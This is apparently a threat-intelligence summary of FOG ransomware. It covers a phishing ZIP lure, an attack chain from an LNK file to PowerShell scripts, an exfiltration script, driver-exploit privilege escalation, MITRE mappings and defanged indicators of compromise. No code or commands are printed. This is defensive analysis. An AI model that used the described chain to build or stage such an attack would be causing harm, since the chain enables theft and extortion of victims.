In our analysis of FOG ransomware, we discovered nine samples uploaded to VirusTotal, linked to the Department of Government Efficiency (DOGE). These ransomware samples were distributed via email, showcasing the ongoing threat posed by FOG ransomware. The investigation revealed various attack vectors and the involvement of multiple sectors, highlighting the need for proactive cybersecurity measures. Affected: FOG ransomware victims, technology sector, education sector, manufacturing sector, transportation sector, healthcare sector, retail sector.
Keypoints :
- FOG ransomware is being distributed through email and phishing attacks, notably using a ZIP file named βPay Adjustment.zipβ.
- The detected samples include various binaries, specifically those with the .flocked extension.
- In total, 100 victims of FOG ransomware have been reported since January 2023, with significant activity in February.
- FOG ransomware targets both individuals and organizations, with victims spanning multiple sectors.
- The investigation identified various components of the ransomware payload, including scripts for data exfiltration and privilege escalation.
- Trend Vision Oneβ’ provides detection and proactive measures against FOG ransomware.
- Implementing network segmentation and maintaining secure backups are crucial recommendations for organizations.
MITRE Techniques :
- Initial Access (T1071.001): The LNK file in the ZIP file performs command execution upon being clicked, leading to the execution of a PowerShell script.
- Execution (T1059.001): The PowerShell script named βstage1.ps1β is downloaded and executed by the initial LNK file.
- Exfiltration Over Command and Control Channel (T1041): The Lootsubmit.ps1 script collects and exfiltrates sensitive system information to a remote server.
- Privilege Escalation (T1068): Ktool.exe exploits a vulnerability in the Intel Network Adapter Driver for privilege escalation.
- Defense Evasion (T1203): The ransomware checks for sandbox indicators to avoid detection before executing its payload.
Indicator of Compromise :
- [URL] hxxps://hilarious-trifle-d9182e.netlify[.]app
- [Monero Wallet Address] 8BejUQh2TAA5rUz3375hHM7JT8ND2i4u5hkVXc9Bcdw1PTrCrrDzayWBj6roJsE1EWBPGU4PMKohHWZUMopE8WkY7iA6UC1
- [File Name] Pay Adjustment.zip
- [File Name] stage1.ps1
- [File Name] Lootsubmit.ps1